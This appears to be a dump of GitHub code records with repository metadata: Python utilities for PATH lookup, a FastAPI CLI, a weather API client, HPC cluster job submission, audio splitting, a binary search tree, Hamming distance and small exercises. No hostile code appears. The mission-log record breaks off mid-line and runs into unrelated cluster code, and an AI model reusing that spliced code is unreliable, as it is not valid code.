os.environ.get(\"PATH\", \"\").split(os.pathsep)\r\n if sys.platform.startswith(\"win\"):\r\n path.insert(0, os.curdir) # implied by Windows shell\r\n else:\r\n usingGivenPath = 1\r\n\r\n # Windows has the concept of a list of extensions (PATHEXT env var).\r\n if sys.platform.startswith(\"win\"):\r\n if exts is None:\r\n exts = os.environ.get(\"PATHEXT\", \"\").split(os.pathsep)\r\n # If '.exe' is not in exts then obviously this is Win9x and\r\n # or a bogus PATHEXT, then use a reasonable default.\r\n for ext in exts:\r\n if ext.lower() == \".exe\":\r\n break\r\n else:\r\n exts = ['.COM', '.EXE', '.BAT']\r\n elif not isinstance(exts, list):\r\n raise TypeError(\"'exts' argument must be a list or None\")\r\n else:\r\n if exts is not None:\r\n raise WhichError(\"'exts' argument is not supported on \"\\\r\n \"platform '%s'\" % sys.platform)\r\n exts = []\r\n\r\n # File name cannot have path separators because PATH lookup does not\r\n # work that way.\r\n if os.sep in command or os.altsep and os.altsep in command:\r\n if os.path.exists(command):\r\n match = _cull((command, \"explicit path given\"), matches, verbose)\r\n if verbose:\r\n yield match\r\n else:\r\n yield match[0]\r\n else:\r\n for i in range(len(path)):\r\n dirName = path[i]\r\n # On windows the dirName *could* be quoted, drop the quotes\r\n if sys.platform.startswith(\"win\") and len(dirName) >= 2\\\r\n and dirName[0] == '\"' and dirName[-1] == '\"':\r\n dirName = dirName[1:-1]\r\n for ext in exts+['']:\r\n absName = os.path.abspath(\r\n os.path.normpath(os.path.join(dirName, command+ext)))\r\n if os.path.isfile(absName):\r\n if usingGivenPath:\r\n fromWhere = \"from given path element %d\" % i\r\n elif not sys.platform.startswith(\"win\"):\r\n fromWhere = \"from PATH element %d\" % i\r\n elif i == 0:\r\n fromWhere = \"from current directory\"\r\n else:\r\n fromWhere = \"from PATH element %d\" % (i-1)\r\n match = _cull((absName, fromWhere), matches, verbose)\r\n if match:\r\n if verbose:\r\n yield match\r\n else:\r\n yield match[0]\r\n match = _getRegisteredExecutable(command)\r\n if match is not None:\r\n match = _cull(match, matches, verbose)\r\n if match:\r\n if verbose:\r\n yield match\r\n else:\r\n yield match[0]\r\n\r\n\r\ndef which(command, path=None, verbose=0, exts=None):\r\n \"\"\"Return the full path to the first match of the given command on\r\n the path.\r\n \r\n \"command\" is a the name of the executable to search for.\r\n \"path\" is an optional alternate path list to search. The default it\r\n to use the PATH environment variable.\r\n \"verbose\", if true, will cause a 2-tuple to be returned. The second\r\n element is a textual description of where the match was found.\r\n \"exts\" optionally allows one to specify a list of extensions to use\r\n instead of the standard list for this system. This can\r\n effectively be used as an optimization to, for example, avoid\r\n stat's of \"foo.vbs\" when searching for \"foo\" and you know it is\r\n not a VisualBasic script but \".vbs\" is on PATHEXT. This option\r\n is only supported on Windows.\r\n\r\n If no match is found for the command, a WhichError is raised.\r\n \"\"\"\r\n try:\r\n match = next(whichgen(command, path, verbose, exts))\r\n except StopIteration:\r\n raise WhichError(\"Could not find '%s' on the path.\" % command)\r\n return match\r\n\r\n\r\ndef whichall(command, path=None, verbose=0, exts=None):\r\n \"\"\"Return a list of full paths to all matches of the given command\r\n on the path. \r\n\r\n \"command\" is a the name of the executable to search for.\r\n \"path\" is an optional alternate path list to search. The default it\r\n to use the PATH environment variable.\r\n \"verbose\", if true, will cause a 2-tuple to be returned for each\r\n match. The second element is a textual description of where the\r\n match was found.\r\n \"exts\" optionally allows one to specify a list of extensions to use\r\n instead of the standard list for this system. This can\r\n effectively be used as an optimization to, for example, avoid\r\n stat's of \"foo.vbs\" when searching for \"foo\" and you know it is\r\n not a VisualBasic script but \".vbs\" is on PATHEXT. This option\r\n is only supported on Windows.\r\n \"\"\"\r\n return list( whichgen(command, path, verbose, exts) )\r\n","repo_name":"dividiti/ck-crowdsource-dnn-optimization","sub_path":"program/dnn-desktop-demo/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":21782,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} +{"seq_id":"26088716220","text":"import typer\nimport uvicorn\n\nfrom .app import app\nfrom .config import settings\n\ncli = typer.Typer(name=\"project_name API\")\n\n\n@cli.command()\ndef run(\n port: int = settings.server.port,\n host: str = settings.server.host,\n log_level: str = settings.server.log_level,\n reload: bool = settings.server.reload,\n): # pragma: no cover\n \"\"\"Run the API server.\"\"\"\n uvicorn.run(\n \"project_name.app:app\",\n host=host,\n port=port,\n log_level=log_level,\n reload=reload,\n )\n\n\n@cli.command()\ndef shell(): # pragma: no cover\n \"\"\"Opens an interactive shell with objects auto imported\"\"\"\n _vars = {\n \"app\": app,\n \"settings\": settings,\n }\n typer.echo(f\"Auto imports: {list(_vars.keys())}\")\n try:\n from IPython import start_ipython\n\n start_ipython(argv=[], user_ns=_vars)\n except ImportError:\n import code\n\n code.InteractiveConsole(_vars).interact()\n","repo_name":"rochacbruno/fastapi-workshop-template","sub_path":"project_name/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"2181569873","text":"from .api import base_api\nimport os\napiKey = os.environ.get('OPEN_WEATHER_MAP_API_KEY')\n\n\ndef get_lat_lon(city, stateCode, countryCode):\n if not city or not countryCode:\n raise Exception('City and Country code must be specified')\n\n relativeUrl = 'geo/1.0/direct'\n params = {\n 'q': f'{city},{stateCode},{countryCode}',\n 'limit': 1,\n 'appid': apiKey\n }\n\n try:\n response = base_api.get_with_params(relativeUrl, params)\n data = response.json()\n\n if len(data) == 0:\n raise Exception(\n f'Failed to retrieve latitude and longitude for {city}')\n\n return {\n 'lat': data[0]['lat'],\n 'lon': data[0]['lon']\n }\n except Exception as error:\n raise Exception(str(error))\n\n\ndef get_weather_data(lat, lon):\n if not lat or not lon:\n raise Exception('Latitude and longitude must be specified')\n\n try:\n relativeUrl = 'data/2.5/weather'\n params = {\n 'lat': lat,\n 'lon': lon,\n 'appid': apiKey\n }\n response = base_api.get_with_params(relativeUrl, params)\n\n return response.json()\n except Exception as error:\n raise Exception(f'Failed to fetch weather data: {str(error)}')\n","repo_name":"oscarcenteno/py_test_automation","sub_path":"api_tests/open_weather_map/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30555407363","text":"def prime(n):\n for i in range(2,n//2+1):\n if n%i==0:\n return 0\n else:\n return 1\nn=int(input())\ns=str(n)\nr=int(s[-1::-1])\nif prime(n)==1 and prime(r)==1:\n print('circular prime')\nelif prime(n)==1 and prime(r)==0:\n print('prime but not a circular prime')\nelse:\n print('not prime')","repo_name":"Divyaratnam/codemind-python","sub_path":"circular_prime.py","file_name":"circular_prime.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24643876874","text":"\"\"\"\nGet the current log from the mission from any command line and print it.\nUse the -f option to watch in real time (similar to tail -f on a file)\n\n\"\"\"\n\nimport os\nimport sys\nimport time\nimport requests\n\ntry:\n from das_constants import CC\nexcept ImportError as e:\n sys.path.append( os.path.join( os.path.dirname(__file__),\"..\"))\n sys.path.append( os.path.join( os.path.dirname(__file__),\"../das_framework\"))\n from das_constants import CC\nimport dashboard\nimport colors\n\ndef print_mission_log(identifier, follow=False, debug=False):\n url = dashboard.api_url(debug_url=debug) + dashboard.DAS_MISSION_API.format(identifier=identifier)\n r = requests.get(url)\n try:\n row = r.json()[0]\n except IndexError:\n print(\"No such mission \",identifier)\n exit(1)\n for (k,v) in row.items():\n print(f\"{k:20} {str(v)[0:60]}\")\n mission_name = row['mission_name']\n\n last = 0\n while follow:\n r = requests.get(dashboard.api_url() + dashboard.DAS_MISSION_LOG.format(identifier=identifier,last=last))\n rows = r.json()\n for row in rows:\n if last 1\n if multithread:\n spec.append(\n \"-pe %(cluster_parallel_environment)s %(job_threads)i -R y\")\n\n if \"cluster_pe_queue\" in options and multithread:\n spec.append(\n \"-q %(cluster_pe_queue)s\")\n elif len(options['cluster_queue']) > 0:\n spec.append(\"-q %(cluster_queue)s\")\n\n elif queue_manager.lower() == \"slurm\":\n\n # SLURM DOCS:\n # http://apps.man.poznan.pl/trac/slurm-drmaa\n # https://computing.llnl.gov/linux/slurm/cons_res_share.html\n #\n # The SLURM Consumable Resource plugin is required\n # The \"CR_CPU_Memory\" resource must be specified\n #\n # i.e. in slurm.conf:\n # SelectType=select/cons_res\n # SelectTypeParameters=CR_CPU_Memory\n #\n # * Note that --cpus-per-task will actually refer to cores\n # with the appropriate Node configuration\n #\n # SLURM-DRMAA DOCS - Note that version 1.2 (SVN) is required\n # http://apps.man.poznan.pl/trac/slurm-drmaa\n #\n # Not implemented:\n # -V: SLURM automatically passess the environment variables\n # -p: does not appear to be part of the slurm drmaa native spec\n #\n # TODO: add \"--account\" (not sure the best way to fill param).\n\n spec = [\"-J %s\" % job_name]\n\n if options[\"cluster_options\"]:\n spec.append(\"%(cluster_options)s\")\n\n if 'job_threads' in options:\n job_threads = options[\"job_threads\"]\n else:\n job_threads = 1 # probably should come from a config option\n\n spec.append(\"--cpus-per-task=%s\" % job_threads)\n\n # Note the that the specified memory must be per CPU\n # for consistency with the implemented SGE approach\n\n if job_memory.endswith(\"G\"):\n job_memory_per_cpu = int(job_memory[:-1]) * 1000\n elif job_memory.endswith(\"M\"):\n job_memory_per_cpu = int(job_memory[:-1])\n else:\n raise ValueError('job memory unit not recognised for SLURM, '\n 'must be either \"M\" (for Mb) or \"G\" (for Gb),'\n ' e.g. 1G or 1000M for 1 Gigabyte of memory')\n\n spec.append(\"--mem-per-cpu=%s\" % job_memory_per_cpu)\n\n # set the partition to use (equivalent of SGE queue)\n spec.append(\"--partition=%(cluster_queue)s\")\n\n elif queue_manager.lower() == \"torque\":\n\n # PBS Torque native specifictation:\n # http://apps.man.poznan.pl/trac/pbs-drmaa\n\n spec = [\"-N %s\" % job_name,\n \"-l mem=%s\" % job_memory, ]\n\n if options[\"cluster_options\"]:\n spec.append(\"%(cluster_options)s\")\n\n # There is no equivalent to sge -V option for pbs-drmaa\n # recreating this...\n jt.jobEnvironment = os.environ.copy()\n jt.jobEnvironment.update({'BASH_ENV': os.path.join(os.environ['HOME'],\n '.bashrc')})\n\n elif queue_manager.lower() == \"pbspro\":\n\n # PBS Pro docs\n # http://www.pbsworks.com/PBSProduct.aspx?n=PBS-Professional&c=Overview-and-Capabilities\n # http://technion.ac.il/usg/tamnun/PBSProUserGuide12.1.pdf\n\n # DRMAA for PBS Pro is the same as for torque:\n # http://apps.man.poznan.pl/trac/pbs-drmaa\n # Webpages with some examples:\n # https://wiki.galaxyproject.org/Admin/Config/Performance/Cluster#PBS\n # https://sites.google.com/a/case.edu/hpc-upgraded-cluster/home/Software-Guide/pbs-drmaa\n # https://albertsk.files.wordpress.com/2011/12/pbs.pdf\n\n # PBS Pro has some differences with torque so separating\n\n # Set environment variables in .bashrc:\n # PBS_DRMAA_CONF to eg ~/.pbs_drmaa.conf\n # DRMAA_LIBRARY_PATH to eg /xxx/libdrmaa.so\n\n # PBSPro only takes the first 15 characters, throws uninformative error if longer.\n # mem is maximum amount of RAM used by job; mem_free doesn't seem to be available.\n # For qsub job requirements would be passed as e.g.\n #PBS -lselect=N:ncpus=X:mem=Ygb\n #PBS -lwalltime=HH:00:00\n # 'select=1' determines de number of nodes. Should go in a config file.\n # mem is per node and maximum memory\n # Site dependent but in general setting '#PBS -l select=NN:ncpus=NN:mem=NN{gb|mb}'\n # is sufficient for parallel jobs (OpenMP, MPI).\n # Also architecture dependent, jobs could be hanging if resource doesn't exist.\n # TO DO: Kill if long waiting time?\n nodes = 1 # TO DO: hard coding as unsure of definitions between\n # threads, nodes, etc. between programmes for now\n\n # Set up basic requirements for job submission:\n # if process has multiple threads, use a parallel environment:\n # TO DO: error in fastqc build_report, var referenced before assignment.\n # For now adding to workaround:\n if 'job_threads' in options:\n job_threads = options[\"job_threads\"]\n else:\n job_threads = 1\n\n spec = [\"-N %s\" % job_name[0:15],\n \"-l select=%s:ncpus=%s:mem=%s\" % (nodes, job_threads, job_memory)]\n\n # Leaving walltime to be specified by user as difficult to set dynamically and\n # depends on site/admin configuration of default values. Likely means setting for\n # longest job with trade-off of longer waiting times for resources to be\n # available for other jobs.\n if options[\"cluster_options\"]:\n conds = ('mem' in options[\"cluster_options\"],\n 'ncpus' in options[\"cluster_options\"],\n 'select' in options[\"cluster_options\"]\n )\n if any(conds):\n spec = [\"-N %s\" % job_name[0:15]]\n spec.append(\"%(cluster_options)s\")\n else:\n spec.append(\"%(cluster_options)s\")\n\n if \"cluster_pe_queue\" in options and multithread:\n spec.append(\"-q %(cluster_pe_queue)s\")\n elif options['cluster_queue'] != \"NONE\":\n spec.append(\"-q %(cluster_queue)s\")\n # TO DO: sort out in Parameters.py to allow none values for configparser:\n elif options['cluster_queue'] == \"NONE\":\n pass\n\n # As for torque, there is no equivalent to sge -V option for pbs-drmaa:\n jt.jobEnvironment = os.environ.copy()\n jt.jobEnvironment.update({'BASH_ENV': os.path.join(os.environ['HOME'],\n '.bashrc')})\n\n else:\n raise ValueError(\"Queue manager %s not supported\" % queue_manager)\n\n jt.nativeSpecification = \" \".join(spec) % options\n\n # keep stdout and stderr separate\n jt.joinFiles = False\n\n return jt\n\n\ndef setDrmaaJobPaths(job_template, job_path):\n '''Adds the job_path, stdout_path and stderr_paths\n to the job_template.\n '''\n job_path = os.path.abspath(job_path)\n\n os.chmod(job_path, stat.S_IRWXG | stat.S_IRWXU)\n\n stdout_path = job_path + \".stdout\"\n stderr_path = job_path + \".stderr\"\n\n job_template.remoteCommand = job_path\n job_template.outputPath = \":\" + stdout_path\n job_template.errorPath = \":\" + stderr_path\n\n return job_template, stdout_path, stderr_path\n\n\ndef expandStatement(statement, ignore_pipe_errors=False):\n '''add generic commands before and after statement.\n\n The prefixes and suffixes added are defined in :data:`exec_prefix`\n and :data:`exec_suffix`. The main purpose of these prefixs is to\n provide error detection code to detect errors at early steps in a\n series of unix commands within a pipe.\n\n Arguments\n ---------\n statement : string\n Command line statement to expand\n ignore_pipe_errors : bool\n If False, do not modify statement.\n\n Returns\n -------\n statement : string\n The expanded statement.\n\n '''\n\n _exec_prefix = '''detect_pipe_error_helper()\n {\n while [ \"$#\" != 0 ] ; do\n # there was an error in at least one program of the pipe\n if [ \"$1\" != 0 ] ; then return 1 ; fi\n shift 1\n done\n return 0\n }\n detect_pipe_error() {\n detect_pipe_error_helper \"${PIPESTATUS[@]}\"\n return $?\n }\n checkpoint() {\n detect_pipe_error;\n if [ $? != 0 ]; then exit 1; fi;\n }\n '''\n\n _exec_suffix = \"; detect_pipe_error\"\n\n if ignore_pipe_errors:\n return statement\n else:\n return \" \".join((_exec_prefix, statement, _exec_suffix))\n\n\ndef collectSingleJobFromCluster(session, job_id,\n statement,\n stdout_path, stderr_path,\n job_path,\n ignore_errors=False):\n '''runs a single job on the cluster.'''\n try:\n retval = session.wait(\n job_id, drmaa.Session.TIMEOUT_WAIT_FOREVER)\n except Exception as msg:\n # ignore message 24 in PBS code 24: drmaa: Job\n # finished but resource usage information and/or\n # termination status could not be provided.\":\n\n if not msg.message.startswith(\"code 24\"):\n raise\n retval = None\n\n stdout, stderr = getStdoutStderr(stdout_path, stderr_path)\n\n if retval and retval.exitStatus != 0 and not ignore_errors:\n raise OSError(\n \"---------------------------------------\\n\"\n \"Child was terminated by signal %i: \\n\"\n \"The stderr was: \\n%s\\n%s\\n\"\n \"-----------------------------------------\" %\n (retval.exitStatus,\n \"\".join(stderr), statement))\n\n if ((retval.hasExited is False or retval.wasAborted is True) and not\n ignore_errors):\n\n raise OSError(\n \"-------------------------------------------------\\n\"\n \"Cluster job was aborted (%s) and/or failed to exit (%s) \"\n \"while running the following statement:\\n\"\n \"\\n%s\\n\"\n \"(Job may have been cancelled by the user or the scheduler)\\n\"\n \"----------------------------------------------------------\\n\" %\n (retval.wasAborted, not retval.hasExited, statement))\n\n try:\n os.unlink(job_path)\n except OSError:\n E.warn(\n (\"temporary job file %s not present for \"\n \"clean-up - ignored\") % job_path)\n\n\ndef getStdoutStderr(stdout_path, stderr_path, tries=5):\n '''get stdout/stderr allowing for same lag.\n\n Try at most *tries* times. If unsuccessfull, throw OSError\n\n Removes the files once they are read.\n\n Returns tuple of stdout and stderr.\n '''\n x = tries\n while x >= 0:\n if os.path.exists(stdout_path):\n break\n time.sleep(1)\n x -= 1\n\n x = tries\n while x >= 0:\n if os.path.exists(stderr_path):\n break\n time.sleep(1)\n x -= 1\n\n try:\n stdout = open(stdout_path, \"r\").readlines()\n except IOError as msg:\n E.warn(\"could not open stdout: %s\" % msg)\n stdout = []\n\n try:\n stderr = open(stderr_path, \"r\").readlines()\n except IOError as msg:\n E.warn(\"could not open stdout: %s\" % msg)\n stderr = []\n\n try:\n os.unlink(stdout_path)\n os.unlink(stderr_path)\n except OSError as msg:\n pass\n\n return stdout, stderr\n","repo_name":"CGATOxford/CGATPipelines","sub_path":"CGATPipelines/Pipeline/Cluster.py","file_name":"Cluster.py","file_ext":"py","file_size_in_byte":13638,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"54"} +{"seq_id":"19185188996","text":"from pydub import AudioSegment\r\nfrom pydub.silence import split_on_silence\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy.io.wavfile as sp\r\n\r\nsound_file = AudioSegment.from_wav(\"xyz.wav\")\r\naudio_chunks = split_on_silence(sound_file,\r\n # must be silent for at least half a second\r\n min_silence_len=20,\r\n\r\n # consider it silent if quieter than -16 dBFS\r\n silence_thresh=-40,\r\n\r\n keep_silence= 50\r\n)\r\n\r\nprint(type(sound_file))\r\n\r\nf,d = sp.read(\"xyz.wav\")\r\nplt.plot(d)\r\nplt.show()\r\nfor i, chunk in enumerate(audio_chunks):\r\n\r\n out_file = \"chunk{0}.wav\".format(i)\r\n print(\"exporting\", out_file)\r\n chunk.export(out_file, format=\"wav\")\r\n\r\nprint(audio_chunks)","repo_name":"meghbhalerao/lip-reading","sub_path":"Audio_Prepocessing/Voice Activity Detection Adaptive.py","file_name":"Voice Activity Detection Adaptive.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"10690838807","text":"from bs4 import BeautifulSoup\n\nimport requests\n\nsite=\"https://lms.netacad.com/grade/report/grader/index.php?id=\"\nid=0\nsite=site+str(id)\n\nhtml = requests.get(site).content\n\nsoup=BeautifulSoup(html, 'html.parser')\n\n\nprint(soup.prettify())\n","repo_name":"deividsonokopnik/netacad-scrapper","sub_path":"scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37772134111","text":"# import __main__ as main\n# from Helper.TimerLogger import CodeTimeLogging\n# fileName = main.__file__\n# fileName = fileName.split('\\\\')[-1]\n\n# CodeTimeLogging(Flag='F', filename=fileName, Tag='Tree', Difficult='Easy')\n\nfrom Datastruct.masterTree import readyTree\n\ntotal = [0]\n\n\ndef greaterTree(root):\n if not root:\n return\n greaterTree(root.rChild)\n total[0] += root.data\n root.data = total[0]\n greaterTree(root.lChild)\n\n\nreadyTree.printTree()\ngreaterTree(readyTree.getHead())\nreadyTree.printTree()\n","repo_name":"Omkar02/FAANG","sub_path":"AZ_LC_538_Convert_BST_to_Greater_Tree.py","file_name":"AZ_LC_538_Convert_BST_to_Greater_Tree.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73415259361","text":"import sys\nfrom itertools import combinations\n\ninput = sys.stdin.readline\n\nN = int(input().rstrip(\"\\n\"))\nstats = [list(map(int, input().rstrip(\"\\n\").split(\" \"))) for _ in range(N)]\n\nall_cases = list(combinations([i for i in range(N)], N // 2)) # 팀이 될 수 있는 모든 경우의 수\n\nstat_gap = sys.maxsize\nfor i in range(len(all_cases) // 2):\n # 첫 번째 팀\n a_team = all_cases[i]\n a_stat = 0\n for member1 in a_team:\n for member2 in a_team:\n a_stat += stats[member1][member2]\n\n # 두 번째 팀\n b_team = all_cases[-(i + 1)] # combinations list에서 대칭으로 팀을 나눌 수 있음\n b_stat = 0\n for member1 in b_team:\n for member2 in b_team:\n b_stat += stats[member1][member2]\n\n stat_gap = min(stat_gap, abs(a_stat - b_stat))\n\nprint(stat_gap)\n","repo_name":"ssun-g/solution","sub_path":"BOJ/python/14889.py","file_name":"14889.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36711292127","text":"\"\"\"\n# !/usr/bin/env 全部\n# -*- coding: utf-8 -*-\n@Time : 2022/4/1 12:07\n@File : HJ103 Redraiment的走法.py\n\"\"\"\n\n\n# HJ103 Redraiment的走法\n\n\ndef stpes(n, nums):\n \"\"\"\n 描述\n Redraiment是走梅花桩的高手。Redraiment可以选择任意一个起点,从前到后,但只能从低处往高处的桩子走。\n 他希望走的步数最多,你能替Redraiment研究他最多走的步数吗?\n 数据范围:每组数据长度满足 1 \\le n \\le 200 \\1≤n≤200 , 数据大小满足 1 \\le val \\le 350 \\1≤val≤350\n :param n:\n :param nums:\n :return:\n \"\"\"\n # 从某位置开始的 最长递增子序列长度\n dp = [1] * n\n for i in range(1, n):\n for j in range(i):\n if nums[i] > nums[j]:\n dp[i] = max(dp[i], dp[j]+1)\n\n max_len = max(dp)\n print(max_len)\n\n\nstpes(6, [2, 5, 1, 5, 4, 5])\n","repo_name":"linksdl/meta-project-learning_programming_algorithms","sub_path":"牛客-华为机考/2-中等/HJ103 Redraiment的走法.py","file_name":"HJ103 Redraiment的走法.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"15802863696","text":"from http.server import HTTPServer, SimpleHTTPRequestHandler\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\nimport datetime\nimport pandas as pd\nimport collections\nimport sys\n\n\nFILE_NAME = sys.argv[-1]\nCOLUMN_FILE = [\"Категория\", \"Название\", \"Сорт\", \"Цена\", \"Картинка\", \"Акция\"]\nCOLUMN_RENAME = {\n \"Категория\":\"category\",\n \"Название\":\"name\",\n \"Сорт\":\"sort\",\n \"Цена\":\"price\",\n \"Картинка\":\"img\",\n \"Акция\":\"sale\"\n }\n\ndef get_age():\n event1 = datetime.datetime(year=1920, month=12, day=31)\n event2 = datetime.datetime.now()\n age_winery = (event2.year - event1.year)\n return age_winery\n\n\ndef fetch_dict_wines():\n data_exel_df = pd.read_excel(f\"{FILE_NAME}.xlsx\",\n sheet_name='Лист1',\n usecols=COLUMN_FILE,\n na_values=['N/A', 'NA'],\n keep_default_na=False)\n\n data_exel_df.rename(columns=COLUMN_RENAME,\n inplace=True)\n\n wine_dicts = data_exel_df.to_dict(orient=\"record\")\n dict_of_lists = collections.defaultdict(list)\n for wine_description in wine_dicts:\n key_category = wine_description[\"category\"]\n dict_of_lists[key_category].append(wine_description)\n return dict_of_lists\n\n\ndef main():\n env = Environment(\n loader=FileSystemLoader('.'),\n autoescape=select_autoescape(['html', 'xml'])\n )\n\n template = env.get_template('template.html')\n try:\n rendered_page = template.render(age_winery=get_age(), wines=fetch_dict_wines())\n except ValueError:\n print(f\"No sale today\\n{sys.exc_info()[1]}\")\n COLUMN_FILE.remove(\"Акция\")\n rendered_page = template.render(age_winery=get_age(), wines=fetch_dict_wines())\n except Exception:\n exit(sys.exc_info()[1])\n\n with open('index.html', 'w', encoding=\"utf8\") as file:\n file.write(rendered_page)\n\n server = HTTPServer(('0.0.0.0', 8000), SimpleHTTPRequestHandler)\n server.serve_forever()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"StiffRedson/wine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42738651390","text":"#!/usr/bin/python\n#-*- coding:utf-8 -*-\n# Author:Sebastian Williams\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right= None\n\nclass BinarySearchTree:\n def __init__(self):\n self.root = None\n\n def search(self, root, parent, data):\n \"\"\"Recursive search\"\"\"\n if root is None:\n return False, root, parent\n if root.data == data:\n return True, root, parent\n if root.data > data:\n return self.search(root.left, root, data)\n else:\n return self.search(root.right, root, data)\n\n def insert(self, data):\n \"\"\"insert data to the tree\"\"\"\n node = Node(data)\n if self.root is None:\n self.root = node\n flag, n, p = self.search(self.root, self.root, data)\n if not flag:\n if data > p.data:\n p.right= node\n else:\n p.left = node\n\n def find_max(self,root):\n if root == None:\n return None\n else:\n if root.right == None:\n return root\n else:\n return self.find_max(root.right)\n\n def find_min(self,root):\n if root == None:\n return None\n else:\n if root.left == None:\n return root\n else:\n return self.find_max(root.left)\n\n def judge_bst(self,root):\n if root == None :\n return True\n if root.left == None and self.find_max(root.left).data > root.data:\n return False\n if root.right == None and self.find_min(root.right).data < root.data:\n return False\n\n if self.judge_bst(root.left) == False or self.judge_bst(root.right):\n return False\n return True\n\n def delete(self, root, data):\n \"\"\"delete data from the tree\"\"\"\n flag, node, parent = self.search(root, root, data)\n if flag is False:\n print(\"There is no the data , delete fail!\")\n else:\n if node.left is None:\n if node == parent.left:\n parent.left = node.right\n else:\n parent.right= node.right\n del parent\n elif node.right is None:\n if node == parent.left:\n parent.left = node.left\n else:\n parent.right= node.left\n del parent\n else: # Left and right subtrees are not empty\n pre = node.right\n if pre.left is None:\n node.data = pre.data\n node.right= pre.right\n del pre\n else:\n next = pre.left\n while next.left is not None:\n pre = next\n next = next.left\n node.data = next.data\n pre.left = next.right\n del parent\n\n def array_to_bst(self,array,left,right):\n if left > right :\n return None\n node = Node(None)\n if left == right:\n node.data = array[left]\n node.left = None\n node.right = None\n else:\n mid = int(left + int((right-left)/2))\n node.data = array[mid]\n node.left = self.array_to_bst(array,left,mid-1)\n node.right = self.array_to_bst(array,mid + 1,right )\n\n return node\n\n\n def preorder(self,root):\n if root is None:\n return []\n result = [root.data]\n left_data = self.preorder(root.left)\n right_data = self.preorder(root.right)\n return result + left_data + right_data\n\n def inorder(self,root):\n if root is None:\n return []\n result = [root.data]\n left_data = self.inorder(root.left)\n right_data = self.inorder(root.right)\n return left_data + result + right_data\n\n def postorder(self,root):\n if root is None:\n return []\n result = [root.data]\n left_data = self.postorder(root.left)\n right_data = self.postorder(root.right)\n return left_data + right_data + result\n\n \nif __name__ == '__main__':\n\n Tree = BinarySearchTree()\n for i in range(20):\n Tree.insert(i)\n print(Tree.inorder(Tree.root))\n \n Tree.delete(Tree.root, 9)\n print(Tree.inorder(Tree.root))\n print(Tree.find_max(Tree.root).data)\n print(Tree.find_min(Tree.root).data)\n #print(Tree.judge_bst(Tree.root))","repo_name":"chenshuo666/cs_data_structure_algorithms","sub_path":"cs_data_structure_and_algorithms/tree/tree_category/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"7499632689","text":"\n# n1 = int(input(\"phele number dalo 0 1 ke form me\"),2)\n# n2 = int(input(\"dusra number dalo ye bhiu 0 1 ke form me\"),2)\n# res = bin(n1^n2).replace(\"0b\",\"\")\n# print(res.count('1'))\ndef binarytodecimal(n):\n l=len(n)\n res=n[: : -1]\n result=0\n for i in range(l):\n result+=int(res[i])*pow(2,i)\n return result\n\ndef decimaltobinary(n):\n if(n<2):\n return str(n)\n ans = decimaltobinary(n//2)\n return ans + str(n%2)\n\nn1 = input(\"phele number dalo 0 1 ke form me\")\nn2 = input(\"phele number dalo 0 1 ke form me\")\ndec_n1=binarytodecimal(n1)\ndec_n2=binarytodecimal(n2)\n\nres_dec=dec_n1^dec_n2\nres_bin= decimaltobinary(res_dec)\ncount=0\nfor i in res_bin:\n if(i=='1'):\n count+=1\nprint(\"hamming distance= \",count)\n\n\n","repo_name":"Ravi-0412/Network-Lab-program","sub_path":"External_Q/hamming_distance.py","file_name":"hamming_distance.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30675306165","text":"import argparse\nimport os\nfrom bin2vec.process_binary_for_graph import Graph\nfrom neural_models.data_processing.parse_graphs_for_gcn import GCN\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('binary', help='path to binary folder')\n args = parser.parse_args()\n binary_folder = args.binary\n graphs = []\n labels = []\n ################################################\n # create bin2vec graphs from cfg\n for root, dirs, files in os.walk(binary_folder):\n for file in files:\n full_path = os.path.join(root, file)\n bin2vec_graph = Graph(full_path)\n if 'bad' in full_path:\n graphs.append(bin2vec_graph)\n labels.append(1)\n elif 'good' in full_path:\n graphs.append(bin2vec_graph)\n labels.append(0)\n #################################################\n # preprocess the data and train using gcn\n gcn = GCN(graphs, labels)\n adj , fea , one = gcn.preprocess()\n gcn.train_gcn(adj, fea, one)\n \n\n\n \n\n\n","repo_name":"usc-isi-bass/binary_analysis","sub_path":"run_bin2vec.py","file_name":"run_bin2vec.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"19491165671","text":"from PIL import Image, ImageDraw\n\ndef clear_all(canvas, background):\n draw = 